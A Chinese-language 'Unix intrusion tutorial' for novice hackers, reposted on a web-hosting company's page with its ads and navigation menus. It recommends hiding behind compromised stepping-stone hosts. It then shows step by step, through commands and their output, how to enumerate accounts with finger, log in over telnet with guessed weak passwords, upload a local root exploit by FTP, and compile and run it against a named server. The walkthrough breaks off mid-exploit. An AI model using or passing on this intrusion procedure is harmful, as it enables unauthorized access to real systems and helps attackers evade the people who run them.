unix入侵教程
文章整理:西部数码--专业提供域名注册、虚拟主机服务
我写这篇文章的目的是给那些想学黑客技术的菜鸟们看的,假如您已是高手了,您能够跳过去没必要看了J这里所讲叙的是从寻找跳板开始到如何擦PP的完整过程.这篇文章纯属研究性文章.请不要将此用于不正当途径.后果自负!!!最后,假如要转载本文请保持文章的完整性,以尊重作者的版权J
一.跳板篇
这些年网上黑客事件也日益增多了,各个国家和网络安全的法令也相继推出了!因而假如想入侵一个系统.而又不想惹上官司,那么自身安全因该是放在第一位.嗯,那么如何才能够确保自己不被发现呢?谈论这个问题的文章出来了很多,但在这众多的方法中我还是比较喜欢使用跳板主机(也就是平时说的堡垒主机),使用跳板主机有几点好处,首先是能够隐藏自己,再就是假如有一台功能齐全的跳板主机能够让工作达到事半功倍的效果:)那么假如得到一台跳板主机呢?
在网络上运行的服务器有很多,最常见的有Unix Linux NT W2k Solaris irix FreeBSD但是在这些主机中我最喜欢用W2k和Linux作为攻击平台了。W2k的Crack方法有很多比如:输入法漏洞,Unicode二次编码漏洞,IPC共享密码猜测等等,这些漏洞的利用方法有很多,而如何将NT/W2k做成跳板的文章也不少,因而我在这里也没有必要再重复了,我建议大家能够看看小榕写的关于如何利用IPC的补充文档,上面有如何将NT/W2k做成跳板的周详过程!
下面我主要介绍如何制作Linux的跳板主机,要得到一台Linux能够用破译弱口令的方法得到,至于破译弱口令的工具我感觉流光是最好用的:)您能够到www.netxeyes.org免费得到。假如不想下工具的朋友,能够使用Finger命令来得到弱口令列表:
比如我们已知道xxx.xxx.xxx.xxx的79端口开放,那么我们能够轻易的得到一些薄弱主机的用户列表J
――――――――――――――――――test――――――――――――――――――
c:>finger 0@xxx.xxx.xxx.xxx
[xxx.xxx.xxx.xxx]
finger:0:no such user
------------------------------------------------------end------------------------------------------------------
失败:(呵呵。。。没关系啦,别灰心我们再来!!!
-------------------------------------------------------test-----------------------------------------------------
c:>finger 0@xxx.xxx.xxx.xxx
[xxx.xxx.xxx.xxx]
Login Name TTY Idle When Where
Root ??? <….>
Bin ??? <….>
Sys ??? <….>
ver21 ??? pst/0 211.25.64.2
liky ??? 437 211.35.26.4
how ??? pst/2 211.65.24.8
tong ??? pst/0 211.85.24.5
test ??? <….>
dv0928 ??? 52 211.54.25.6
nobody ??? 021 211.25.42.6
imnadm ??? 62 211.23.65.5
哈哈。。。这么多用户:)这下我发了:)
c:\>telnet xxx.xxx.xxx.xxx
Red Hat Linux release 6.0 Publisher's Edition (Hedwig)
Kernel 2.2.5-15 on an i586
Login:nobody
Password:
Login incorrect
Login:imnadm
Password:
Login incorrect
Login:test
Password:
##########################################################################
# However,as the Serv will reload those classes. #
# inside the “/usr/proj/gipex/class”.you just. #
# need to remove the old class with the new one. #
# #########################################################################
$w
6:19pm up 61 day(s), 3:40, 3 users, load average: 0.11, 0.07, 0.10
User tty login@ idle JCPU PCPU what
root console 4May0161days 2 2 /usr/dt/bin/sdt_shell -c ?
root pts/4 Fri 4pm 5days tail -f syslog
delex pts/7 6:19pm w
$uname –a
Linux server.syscrew.co.jp 2.2.5-15 #1 Mon Apr 19 21:39:28 EDT 1999 i586 unknown
$gcc
gcc: No input files
不错哈。。我能够编译程式了:)
下面我就要来个本地溢出得到ROOT只有ROOT才能够干我想干的事情啊!!!
Su.c能够在www.hack.co.za找到!!!
好了,下载下来。。。。
c:\>ftp xxx.xxx.xxx.xxx
Connected to xxx.xxx.xxx.xxx
220 server.syscrew.co.jp FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:5
3 EDT 1999) ready.
User (xxx.xxx.xxx.xxx:(none)):test
331 Password required for test.
Password:
ftp>put su.c
200 PORT command successful.
150 Opening ASCII mode data connection for su.c.
226 Transfer complete.
ftp: 12554 bytes sent in 0.00Seconds 12554000.00Kbytes/sec.
ftp>bye
221-You have transferred 11991 bytes in 1 files.
221-Total traffic for this session was 12355 bytes in 1 transfers.
221-Thank you for using the FTP service on xxx.xxx.xxx.xxx.
221 Goodbye.
好了换telnet来
$gcc –o su su.c
$./su
su exploit by XP
Enjoy!
Phase 1. Checking paths and write permisions
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
unix入侵教程
来源:互联网
作者:west263.com
时间:2008-04-16
西部数码-全国虚拟主机10强!40余项虚拟主机管理功能,全国领先!双线多线虚拟主机南北访问畅通无阻!免费赠送企业邮局,.CN域名,自助建站480元起,免费试用7天,满意再付款! P4主机租用799元/月.月付免压金!
unix入侵教程
热点关注
- 快速学习如何搭建一个赚钱
- 什么是CPA、CPC、CPM、CPO
- 论文:Web安全对策研究
- 新手站长35天自学引路
- 站长资讯网第二版上线
- 网络营销网站功能设计的几
- 女站长的建站理财文章
- 也谈域名备案 -- 撤销已存
- 自己动手做网站 个人站长
- 对第一次做网站的朋友说些
- 传统网站逼得Web2.0没法活
- 被K过的域名如何被百度重
- 如何选择理想IDC服务商十
- 技巧:Vimdiff 使用
- 网络创业经历 靠卖域名来
- 如何提高网站流量之小节
- 王晨昀:个人网站为什么要
- 企业开展网络营销存在的误
- 一个失败者谈地方门户的运
- 域名注册与虚拟主机的选购
- SEO360的搜索引擎优化推广
- 网站运营与网络运营的一字
- 做网站要做出自己的个性—
- 中国网站内容不可逾越的三
- 如何将新网及商务中国的域
- 08年,个人站长赚钱将更加
- 保证能增加RSS订阅量的35
- 企业网站英文版制作几个关
- 龚文祥:互联网运营关键词
- 我的行业垃圾站
- 2008最新申请Google adsen
- 虚拟主机的陷阱
- 网站建设发展的几点中肯建
- 企业如何安全高效使用垃圾
- 计算机文件夹删除不掉怎么
IDC资讯
虚拟主机
域名注册
托管租用
vps主机
智能建站
网站运营 建站经验 策划盈利 搜索优化 网站推广 免费资源
网站联盟 联盟新闻 联盟介绍 联盟点评 网赚技巧
行业资讯 业界动态 搜索引擎 网络游戏 门户动态 电子商务 广告传媒
网络编程 Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术 Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷 Internet Explorer
网页制作 FrontPages Dreamweaver Javascript css photoshop fireworks Flash
程序设计 Java技术 C/C++ VB delphi
网络知识 网络协议 网络安全 网络管理 组网方案 Cisco技术
操作系统 Win2000 WinXP Win2003 Mac OS Linux FreeBSD
网站运营 建站经验 策划盈利 搜索优化 网站推广 免费资源
网站联盟 联盟新闻 联盟介绍 联盟点评 网赚技巧
行业资讯 业界动态 搜索引擎 网络游戏 门户动态 电子商务 广告传媒
网络编程 Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术 Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷 Internet Explorer
网页制作 FrontPages Dreamweaver Javascript css photoshop fireworks Flash
程序设计 Java技术 C/C++ VB delphi
网络知识 网络协议 网络安全 网络管理 组网方案 Cisco技术
操作系统 Win2000 WinXP Win2003 Mac OS Linux FreeBSD



